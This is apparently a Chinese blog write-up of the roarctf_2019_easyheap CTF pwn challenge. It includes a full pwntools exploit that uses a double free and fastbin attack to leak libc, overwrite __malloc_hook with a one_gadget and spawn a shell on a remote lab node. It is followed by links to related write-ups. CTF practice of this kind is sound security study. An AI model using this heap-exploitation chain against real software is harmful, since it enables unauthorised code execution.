roarctf_2019_easyheap

已于 2022-04-10 13:11:08 修改
阅读量414 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
于 2022-04-10 13:09:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124076507
版权

roarctf_2019_easyheap

查看保护
在这里插入图片描述
在这里插入图片描述
有一个大uaf,show的条件是bss上的一个数据应该 为0xdead…
在这里插入图片描述
在666中可以进行删除和创建,这里有一个bug,602010这个数据变成0之后–就是成负数可以无限次使用了
攻击思路:因为有uaf和666这个功能,所以我们构造fastbin attack 形成double free,其实fastbin attack使用的是fastbin_dup_consolidate这个手法。构造出double free之后将堆申请到name_addr这里,在输入name的时候先伪造出一个堆,这里的手法使用fastbin_dup_into_stack。
到达name可以改下面的heap_ptr和show_flag了。
在这里插入图片描述
顺便将heap_ptr改成puts_got这样show之后可以输出libc。
在这里插入图片描述
这里有一个小坑点就是close(1) close(2),程序会提示EOF,但是我们还是可以继续执行的,只不过看不到输出而已
再次利用上面的手法形成double free申请到malloc_hook - 0x23,劫持malloc_hook,这一题需要使用realloc来调整堆栈。
最后getshell之后发送一个exec 1>&0就可以看到输出了。
注意:这里笔者不再详细的写fastbin_dup_consolidate这些攻击手法,具体的话可以看笔者blog里的z1r0’s bloghow2heap这些

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27159)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = ">> "
def add(size, content, after = False):
	if not after:
		r.recvuntil(menu)
	else:
		sleep(0.1)
	r.sendline('1')
	if not after:
		r.recvuntil("input the size\n")
	else:
		sleep(0.1)
	r.sendline(str(size))
	if not after:
		r.recvuntil("please input your content\n")
	else:
		sleep(0.1)
	r.send(content)

def delete(after = False):
	if not after:
		r.recvuntil(menu)
	else:
		sleep(0.1)
	r.sendline('2')


def show():
	r.recvuntil(menu)
	r.sendline('3')


def calloc(choice, content='', after = False):
	if not after:
		r.recvuntil(menu)
	else:
		sleep(0.1)
	r.sendline('666')
	if not after:
		r.recvuntil("build or free?\n")
	else:
		sleep(0.1)
	r.sendline(str(choice))	#1.add 2.free
	if choice == 1:
		if not after:
			r.recvuntil("please input your content\n")
		else:
			sleep(0.1)
		r.send(content)

fake_chunk = p64(0) + p64(0x71)
fake_chunk = fake_chunk.ljust(0x20, b'\x00')
r.sendafter('please input your username:', fake_chunk)
r.sendafter('please input your info:', 'aaaaa\n')


calloc(1, b'a' * 0xa0)
add(0x60, b'b' * 0x60)
calloc(2)
add(0x60, b'c' * 0x60)
add(0x60, b'd' * 0x60)

delete()
calloc(2)
delete()

name_addr = 0x602060
puts_got = elf.got['puts']
add(0x60, p64(name_addr))
add(0x60, b'e' * 0x60)
add(0x60, b'f' * 0x60)
add(0x60, b'g' * 0x18 + p64(puts_got) + p64(0xDEADBEEFDEADBEEF))

show()

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('[+] puts_addr = ' + hex(puts_addr))

libc = ELF('./libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
system_addr = libc.sym['system'] + libc_base
malloc_hook = libc_base + libc.sym['__malloc_hook']
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = one[3] + libc_base
realloc_hook = libc_base + libc.sym['realloc']

calloc(1, b'a', True)
calloc(1, b'a' * 0xa0, True)
add(0x60, b'b' * 0x60, True)
calloc(2, after = True)
add(0x60, b'c' * 0x60, True)
add(0x60, b'd' * 0x60, True)
delete(True)
calloc(2, after = True)
delete(True)

add(0x60, p64(malloc_hook - 0x23), True)
add(0x60, 'a'*0x60, True)
add(0x60, 'b'*0x60, True)

p2 = b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc_hook + 0x14)
#p2 = b'a' * 0x13 + p64(one_gadget)
add(0x60, p2, True)

r.sendline('1')
sleep(0.1)
r.sendline('16')

r.sendline("exec 1>&0")

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 771
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
【pwn】 roarctf_2019_realloc_magic
Nothing
03-05 1005
例行检查 保护全开,分析程序逻辑。发现没有输出堆内容的函数,想要泄露libc地址只能通过修改IO_FILE结构体实现。realloc函数有两个trick。在size为0时,free掉指针指向的堆块,返回0;在分配超过当前指针指向堆块大小时如果有剩余空间则扩大堆块大小。 利用思路 1.堆块free 8次放进unsortbin中,在fd上得到arena地址,通过realloc扩大堆块的特性造成堆块堆叠...
roarctf_2019_easyheap(文件描述符1关闭后仍然可以交互)
seaaseesa的博客
04-17 599
roarctf_2019_easyheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 最开始的时候,我们可以在bss段输入一些数据,这意味着,我们可以在bss段伪造一个chunk show功能必须要满足条件才能使用 Free后没有清空指针,因此存在double free。 666功能也可以创建和free堆,但是有次数限制,但是这个次数限制也存在漏洞,即q...
buuctf_roarctf_2019_easyheap离谱的一题
qq_43766802的博客
09-29 621
首先例行公事,用checksec检查一下函数的保护措施,发现除了pie保护全开,但此题不需要泄漏程序加载地址,是个好事 查看一下函数逻辑,程序一开始我们可以向内存区域的某一块输入数据,接下来就是heap的经典菜单栏,add函数允许我们创建任意大小的buf,但只有一个指针,free时没有删除指针,可以double free,当我们输入666时程序允许我们添加和free一个大小固定的chunk给ptr,这个ptr其实没什么用,主要用来给自定义大小的buf double free做道具用,show函数只有当
[RoarCTF 2019]Easy Java1
最新发布
zzqzzq11的博客
11-30 375
这个web.xml是⼀个典型的配置⽂件,也就是代表了哪个url去对应哪个java的class⽂件去处理。这⾥有⼀个download的请求。利⽤post请求可以获取。随后可以看到下⾯对应的class⽂件。这题考查的是java后端框架结构。
[RoarCTF 2019]Easy Calc1详细多种题解+整体思考路程(必看)
m0_73728268的博客
03-14 324
1.学习了php对于字符串解析字符串2.对php函数不熟悉3.第一次见http走私漏洞4.基本绕过方法不熟悉。
stock, 30天掌握量化交易 (待更新).zip
09-16
stock, 30天掌握量化交易 (待更新)
simple-upload
04-01
"simple-upload"是一个针对Web开发的模块,主要功能是实现多图片上传。这个工具的目的是为了简化图片上传的处理流程,使其能够无缝地集成到各种Web开发框架中。"upload"标签表明了这个项目的核心特性,即文件上传,...
[.NET] 超难控制流混淆UnpackMe
11-12
在.NET编程环境中,控制流混淆(Control Flow Obfuscation,CFO)是一种常见的代码保护技术,用于增强软件的安全性,防止恶意逆向工程分析。"UnpackMe"通常指的是一个挑战性的程序,它包含了某种混淆机制,需要逆向...
ciscn_2019_qual_virtual
z1r0的博客
04-11 315
ciscn_2019_qual_virtual z1r0’s blog
mrctf2020_shellcode
z1r0的博客
12-11 1419
mrctf2020_shellcode 查看保护 直接写shellcode就可以了。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25728) else: r = process(file_name) elf = ELF(file_name)
ciscn 2022 华东北分区赛pwn blue
z1r0的博客
07-02 784
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
zctf2016_note2
z1r0的博客
02-02 574
zctf2016_note2 查看保护 这是一个漏洞点。在edit的时候 ,选择append时就会产生越界,如果size开始为0,则v1[v6 - strlen(&dest) + 14] <= 14了,所以在执行strncat时可以无限附加覆盖下一个堆块。所以可以申请fastbin,因为可以覆盖后面的堆块,在name中伪装假的堆块,然后对其进行释放这样再申请时就会得到其地址,从而改写指针 简单理解的话就是size为0的chunk可以无限追加数据。然后追加到最后可以修改heap_ptr那里的
roarctf_2019_easy_pwn
hanabi_sh
12-20 526
buuctf pwn roarctf_2019_easy_pwn off-by-one
【BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 1909
realloc好题
RoarCTF_Web_Writeup
Lethe's Blog
10-24 1090
周末有点事,BUUCTF上复现一下… easy_calc 这一题的界面和国赛的lova_math一题一样,应该是从那题改的。 源码中提示了这题加了waf,我们访问calc.php,看到源码如下 num传入表达式,然后用eval()计算并输出,因为加了waf所以num中如果有字母,会直接返回403,所以第一步就是绕过它。 这里可以利用HTTP请求走私来绕过,关于该漏洞可参考这篇文章:协议层的攻击...
【pwn】roarctf_2019_easy_pwn
Nothing
12-24 2080
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 260
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值